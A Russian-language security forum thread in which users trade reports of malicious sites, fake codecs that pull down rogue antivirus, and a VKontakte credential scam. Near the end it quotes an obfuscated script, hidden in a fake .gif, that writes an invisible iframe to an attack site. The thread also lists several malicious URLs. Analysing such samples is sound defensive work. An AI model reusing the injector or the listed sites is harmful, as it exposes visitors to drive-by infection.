-
PUA.Script.Packed-2 похоже что глюк, совпадение с сигнатурой какого нибудь трояна, подождите пока кто нибудь ещё ответит
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-

Сообщение от
sabello
хттп://www.vf-guse.ru/templates/it_tribune/js/mootools.php//mootools Opera Internet Browser Запрещено: HEUR:Trojan-Downloader.Script.Generic
Там есть
eval(function(p,a,c,k,e,r){e=function(c)
так что Generic-реакция понятна..
The worst foe lies within the self...
-
-
Кто что знает об http://vkontakte-rating.com сайте? Особенно интересуют программы, которые на нем. Есть ли там вирусы? Так как в них надо вводить логин и пароль...
Клуб любителей Symantec - http://symantecclub.ru/
-
-
Хотел посмотреть программу для поднятия рейтинга, но чтобы узнать пароль на архив нужно отдать копеичку
-
-
VkontakteRatingMaste? Я скачал, но пароля на архиве нет. Правда качал не с этого сайта
Клуб любителей Symantec - http://symantecclub.ru/
-
-
Да... обычно это GUI-троян...
-
-

Сообщение от
senyak
Кто что знает об _http://vkontakte-rating.com сайте? Особенно интересуют программы, которые на нем. Есть ли там вирусы? Так как в них надо вводить логин и пароль...
У меня показывает авира что вирусы HTML/Infected.WebPage.Gen
---
Внимание! Лохотрон
Последний раз редактировалось Alexey P.; 01.04.2009 в 18:36.
Причина: ссылка деактивирована
-
-
Вот один чел искал через гуглю сайтец одноклассников и нод мне сообщил
IMON - Интернет-монитор Инициирована программная вирусная тревога на COMP13: hттp://odnoklassniki.co.ua/ инфицирован HTML/TrojanClicker.IFrame.NAG троян.
-
-

Сообщение от
Torvic99
Вот один чел искал через гуглю сайтец одноклассников и нод мне сообщил
IMON - Интернет-монитор Инициирована программная вирусная тревога на COMP13: hттp://odnoklassniki.co.ua/ инфицирован HTML/TrojanClicker.IFrame.NAG троян.
Странные корни у них - Japan
-
-

Сообщение от
Гриша
Хотел посмотреть программу для поднятия рейтинга, но чтобы узнать пароль на архив нужно отдать копеичку

http://files.mail.ru/JMXL8H - без пароля на архив
Клуб любителей Symantec - http://symantecclub.ru/
-
-
Они себе зарабатывают на платных файлообменниках и на этих глупых смс, проги эти все пустышки, ещё там нашел для взлома вконтакте, якобы брут, указал перебор из текстового файла только свой пароль, байда полная...
Добавлено через 1 час 6 минут
Вот ещё, поржать можно grandpro-line.com
http://www.flickr.com/photos/3668319...22957/sizes/o/
Контакты для связи крутые 
Директор компании: adminXgrandpro-line.com
Поддержка: supportXgrandpro-line.com
Ещё пару дней назад там был фальшивый обменный пункт
http://www.flickr.com/photos/3668319...29693/sizes/o/
На него зазывали объявлениями о заработке на разнице курсов валют в разных обменниках, при обмене на нём, деньги пропадали навсегда, их много таких
Последний раз редактировалось valho; 02.04.2009 в 04:04.
Причина: Добавлено
-
-
Похоже паук "съел" другого паука
1 что сейчас
2 что там было
-
-
хттп://hot-girl-sex-tube.com/ - там явно вирус, в виде кодека
http://www.virustotal.com/ru/analisi...8bf2f66fb351bc
Клуб любителей Symantec - http://symantecclub.ru/
-
-

Сообщение от
senyak
Опасно!
Exploit: Trojan Fake Codec
This appears to be a fake codec. An increasingly common ploy is to offer to play a free video, and then to tell you that your computer cannot display the video, and needs a new codec, and 'Click here for the new codec'. The victim is prompted to install the codec, and sometimes gets to see the video, and sometimes doesn't, and usually is able to uninstall the 'codec'. What the victim doesn't realize is that it usually leaves behind a rootkit.
---
Интересно, это значит у импортных давно всё есть, а у нас если такое встречаешь то никаких предупреждений в помине нет
Добавлено через 28 минут
Запустил этот файлик, далее пошла загрузка с IP 195.88.80.207 (Латвия) ещё одного - XPAntivirus, далее этот антивирус будет говорить что у вас не всё трали-вали с системой и так до бесконечности пока не сопрут с компика всё что им нужно...
Последний раз редактировалось valho; 15.04.2009 в 17:21.
Причина: Добавлено
-
-
А какой у Вас антивирус? Кстати, эту ссыдку взял с русского форума Авиры. Там боты каждую минуту регятся
Клуб любителей Symantec - http://symantecclub.ru/
-
-

Сообщение от
senyak
А какой у Вас антивирус? Кстати, эту ссыдку взял с русского форума Авиры. Там боты каждую минуту регятся
Старый симантек корп 10.1.7.7000 и ещё avg exploit link scanner, мне его здесь на форуме подсказали
Добавлено через 11 минут
Вот что это было (XPAntivirus) http://www.prevx.com/filenames/X2847...S2009.EXE.html
Добавлено через 25 минут
Вот логи этой хадости MSAS2009.EXE http://www.virustotal.com/analisis/f...03fc26c77076e8
вот картинка -

что то у мя такое подозрение что сандбокс мой компик спас только наполовину
Последний раз редактировалось valho; 15.04.2009 в 18:59.
Причина: Добавлено
-
-
Junior Member
- Вес репутации
- 58
У знакомой увели аську и периодически, с ее номера получал ссылочки на закачку СкринСейвера с пинчем. Но тут стали приходить ссылочки на картинку с
http://yehoshua-m.com/images/
auto.gif
Если взглянуть во внутрь, оказывается, что gif это просто текстовый файл (Первый символ в файле auto.gif шестнадцатеричное 0A)
<img src="WorleyVision5.jpg"> <script type="text/javascript">document.write('\u003c\u0069\u0066\u00 72\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d \u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u 0066\u006f\u0072\u006b\u0061\u002e\u006f\u0072\u00 67\u002f\u0073\u0074\u0061\u0074\u0073\u002f\u0072 \u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u 0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u00 69\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f \u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u 0072\u0061\u006d\u0065\u003e')</script>
WorleyVision5.jpg - обычная картинка лежащая в каталоге. Вопрос, что творит этот джаваскрипт? (NoScript не дает его выполнить)
P.S. Интересно, что между jpg картинкой и текстом скрипта, туева хуча пробелов (т.е. просто жамкнув на просмотр, кода не видно)
-

Сообщение от
wowka
Вопрос, что творит этот джаваскрипт? (NoScript не дает его выполнить)
Он дописывает и-фрейм на сайт, который

Сообщение от
FireFox
Имеется информация, что этот сайт атакует компьютеры!
The worst foe lies within the self...
-
-
Junior Member
- Вес репутации
- 58

Сообщение от
Kuzz
Он дописывает и-фрейм на сайт, который
А у меня как партизан молчит
-

Сообщение от
wowka
А у меня как партизан молчит
Так NoScript не дал дописать и-фрейм - браузер и не пошел туда.
Потому и молчит
The worst foe lies within the self...
-